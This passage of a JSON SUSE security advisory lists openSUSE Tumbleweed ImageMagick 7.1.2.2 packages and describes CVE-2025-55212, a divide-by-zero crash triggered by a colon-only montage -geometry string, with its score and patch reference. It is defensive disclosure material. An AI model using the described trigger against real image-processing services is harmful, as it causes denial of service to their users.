"product_id": "openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-32bit-7.1.2.2-2.1.x86_64"
},
"product_reference": "libMagick++-7_Q16HDRI5-32bit-7.1.2.2-2.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-devel-7.1.2.2-2.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libMagick++-devel-7.1.2.2-2.1.aarch64"
},
"product_reference": "libMagick++-devel-7.1.2.2-2.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-devel-7.1.2.2-2.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libMagick++-devel-7.1.2.2-2.1.ppc64le"
},
"product_reference": "libMagick++-devel-7.1.2.2-2.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-devel-7.1.2.2-2.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libMagick++-devel-7.1.2.2-2.1.s390x"
},
"product_reference": "libMagick++-devel-7.1.2.2-2.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-devel-7.1.2.2-2.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libMagick++-devel-7.1.2.2-2.1.x86_64"
},
"product_reference": "libMagick++-devel-7.1.2.2-2.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-devel-32bit-7.1.2.2-2.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libMagick++-devel-32bit-7.1.2.2-2.1.aarch64"
},
"product_reference": "libMagick++-devel-32bit-7.1.2.2-2.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-devel-32bit-7.1.2.2-2.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libMagick++-devel-32bit-7.1.2.2-2.1.ppc64le"
},
"product_reference": "libMagick++-devel-32bit-7.1.2.2-2.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-devel-32bit-7.1.2.2-2.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libMagick++-devel-32bit-7.1.2.2-2.1.s390x"
},
"product_reference": "libMagick++-devel-32bit-7.1.2.2-2.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-devel-32bit-7.1.2.2-2.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libMagick++-devel-32bit-7.1.2.2-2.1.x86_64"
},
"product_reference": "libMagick++-devel-32bit-7.1.2.2-2.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickCore-7_Q16HDRI10-7.1.2.2-2.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-7.1.2.2-2.1.aarch64"
},
"product_reference": "libMagickCore-7_Q16HDRI10-7.1.2.2-2.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickCore-7_Q16HDRI10-7.1.2.2-2.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-7.1.2.2-2.1.ppc64le"
},
"product_reference": "libMagickCore-7_Q16HDRI10-7.1.2.2-2.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickCore-7_Q16HDRI10-7.1.2.2-2.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-7.1.2.2-2.1.s390x"
},
"product_reference": "libMagickCore-7_Q16HDRI10-7.1.2.2-2.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickCore-7_Q16HDRI10-7.1.2.2-2.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-7.1.2.2-2.1.x86_64"
},
"product_reference": "libMagickCore-7_Q16HDRI10-7.1.2.2-2.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickCore-7_Q16HDRI10-32bit-7.1.2.2-2.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-32bit-7.1.2.2-2.1.aarch64"
},
"product_reference": "libMagickCore-7_Q16HDRI10-32bit-7.1.2.2-2.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickCore-7_Q16HDRI10-32bit-7.1.2.2-2.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-32bit-7.1.2.2-2.1.ppc64le"
},
"product_reference": "libMagickCore-7_Q16HDRI10-32bit-7.1.2.2-2.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickCore-7_Q16HDRI10-32bit-7.1.2.2-2.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-32bit-7.1.2.2-2.1.s390x"
},
"product_reference": "libMagickCore-7_Q16HDRI10-32bit-7.1.2.2-2.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickCore-7_Q16HDRI10-32bit-7.1.2.2-2.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-32bit-7.1.2.2-2.1.x86_64"
},
"product_reference": "libMagickCore-7_Q16HDRI10-32bit-7.1.2.2-2.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickWand-7_Q16HDRI10-7.1.2.2-2.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-7.1.2.2-2.1.aarch64"
},
"product_reference": "libMagickWand-7_Q16HDRI10-7.1.2.2-2.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickWand-7_Q16HDRI10-7.1.2.2-2.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-7.1.2.2-2.1.ppc64le"
},
"product_reference": "libMagickWand-7_Q16HDRI10-7.1.2.2-2.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickWand-7_Q16HDRI10-7.1.2.2-2.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-7.1.2.2-2.1.s390x"
},
"product_reference": "libMagickWand-7_Q16HDRI10-7.1.2.2-2.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickWand-7_Q16HDRI10-7.1.2.2-2.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-7.1.2.2-2.1.x86_64"
},
"product_reference": "libMagickWand-7_Q16HDRI10-7.1.2.2-2.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickWand-7_Q16HDRI10-32bit-7.1.2.2-2.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-32bit-7.1.2.2-2.1.aarch64"
},
"product_reference": "libMagickWand-7_Q16HDRI10-32bit-7.1.2.2-2.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickWand-7_Q16HDRI10-32bit-7.1.2.2-2.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-32bit-7.1.2.2-2.1.ppc64le"
},
"product_reference": "libMagickWand-7_Q16HDRI10-32bit-7.1.2.2-2.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickWand-7_Q16HDRI10-32bit-7.1.2.2-2.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-32bit-7.1.2.2-2.1.s390x"
},
"product_reference": "libMagickWand-7_Q16HDRI10-32bit-7.1.2.2-2.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickWand-7_Q16HDRI10-32bit-7.1.2.2-2.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-32bit-7.1.2.2-2.1.x86_64"
},
"product_reference": "libMagickWand-7_Q16HDRI10-32bit-7.1.2.2-2.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perl-PerlMagick-7.1.2.2-2.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:perl-PerlMagick-7.1.2.2-2.1.aarch64"
},
"product_reference": "perl-PerlMagick-7.1.2.2-2.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perl-PerlMagick-7.1.2.2-2.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:perl-PerlMagick-7.1.2.2-2.1.ppc64le"
},
"product_reference": "perl-PerlMagick-7.1.2.2-2.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perl-PerlMagick-7.1.2.2-2.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:perl-PerlMagick-7.1.2.2-2.1.s390x"
},
"product_reference": "perl-PerlMagick-7.1.2.2-2.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perl-PerlMagick-7.1.2.2-2.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:perl-PerlMagick-7.1.2.2-2.1.x86_64"
},
"product_reference": "perl-PerlMagick-7.1.2.2-2.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-55212",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-55212"
}
],
"notes": [
{
"category": "general",
"text": "ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to versions 6.9.13-28 and 7.1.2-2, passing a geometry string containing only a colon (\":\") to montage -geometry leads GetGeometry() to set width/height to 0. Later, ThumbnailImage() divides by these zero dimensions, triggering a crash (SIGFPE/abort), resulting in a denial of service. This issue has been patched in versions 6.9.13-28 and 7.1.2-2.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:ImageMagick-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:ImageMagick-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:ImageMagick-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:ImageMagick-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:ImageMagick-config-7-SUSE-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:ImageMagick-config-7-SUSE-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:ImageMagick-config-7-SUSE-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:ImageMagick-config-7-SUSE-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:ImageMagick-devel-32bit-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:ImageMagick-devel-32bit-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:ImageMagick-devel-32bit-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:ImageMagick-devel-32bit-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:ImageMagick-devel-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:ImageMagick-devel-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:ImageMagick-devel-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:ImageMagick-devel-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:ImageMagick-doc-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:ImageMagick-doc-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:ImageMagick-doc-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:ImageMagick-doc-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:ImageMagick-extra-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:ImageMagick-extra-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:ImageMagick-extra-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:ImageMagick-extra-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-32bit-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-32bit-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-32bit-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-32bit-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:libMagick++-devel-32bit-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:libMagick++-devel-32bit-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:libMagick++-devel-32bit-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:libMagick++-devel-32bit-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:libMagick++-devel-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:libMagick++-devel-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:libMagick++-devel-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:libMagick++-devel-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-32bit-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-32bit-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-32bit-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-32bit-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-32bit-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-32bit-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-32bit-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-32bit-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:perl-PerlMagick-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:perl-PerlMagick-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:perl-PerlMagick-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:perl-PerlMagick-7.1.2.2-2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-55212",
"url": "https://www.suse.com/security/cve/CVE-2025-55212"
},
{
"category": "external",
"summary": "SUSE Bug 1248767 for CVE-2025-55212",
"url": "https://bugzilla.suse.com/1248767"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:ImageMagick-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:ImageMagick-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:ImageMagick-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:ImageMagick-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:ImageMagick-config-7-SUSE-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:ImageMagick-config-7-SUSE-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:ImageMagick-config-7-SUSE-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:ImageMagick-config-7-SUSE-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:ImageMagick-devel-32bit-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:ImageMagick-devel-32bit-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:ImageMagick-devel-32bit-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:ImageMagick-devel-32bit-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:ImageMagick-devel-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:ImageMagick-devel-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:ImageMagick-devel-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:ImageMagick-devel-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:ImageMagick-doc-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:ImageMagick-doc-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:ImageMagick-doc-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:ImageMagick-doc-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:ImageMagick-extra-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:ImageMagick-extra-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:ImageMagick-extra-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:ImageMagick-extra-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-32bit-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-32bit-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-32bit-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-32bit-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:libMagick++-devel-32bit-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:libMagick++-devel-32bit-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:libMagick++-devel-32bit-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:libMagick++-devel-32bit-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:libMagick++-devel-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:libMagick++-devel-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:libMagick++-devel-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:libMagick++-devel-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-32bit-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-32bit-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-32bit-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-32bit-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-32bit-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-32bit-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-32bit-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-32bit-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:perl-PerlMagick-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:perl-PerlMagick-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:perl-PerlMagick-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:perl-PerlMagick-7.1.2.2-2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:ImageMagick-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:ImageMagick-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:ImageMagick-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:ImageMagick-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:ImageMagick-config-7-SUSE-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:ImageMagick-config-7-SUSE-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:ImageMagick-config-7-SUSE-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:ImageMagick-config-7-SUSE-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:ImageMagick-devel-32bit-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:ImageMagick-devel-32bit-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:ImageMagick-devel-32bit-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:ImageMagick-devel-32bit-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:ImageMagick-devel-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:ImageMagick-devel-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:ImageMagick-devel-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:ImageMagick-devel-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:ImageMagick-doc-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:ImageMagick-doc-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:ImageMagick-doc-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:ImageMagick-doc-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:ImageMagick-extra-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:ImageMagick-extra-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:ImageMagick-extra-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:ImageMagick-extra-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-32bit-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-32bit-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-32bit-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-32bit-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:libMagick++-devel-32bit-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:libMagick++-devel-32bit-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:libMagick++-devel-32bit-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:libMagick++-devel-32bit-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:libMagick++-devel-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:libMagick++-devel-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:libMagick++-devel-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:libMagick++-devel-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-32bit-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-32bit-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-32bit-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-32bit-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-32bit-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-32bit-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-32bit-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-32bit-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:perl-PerlMagick-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:perl-PerlMagick-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:perl-PerlMagick-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:perl-PerlMagick-7.1.2.2-2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-08-28T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2025-55212"
},
{
"cve": "CVE-2025-55298",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-55298"
}
],
"notes": [
{
"category": "general",
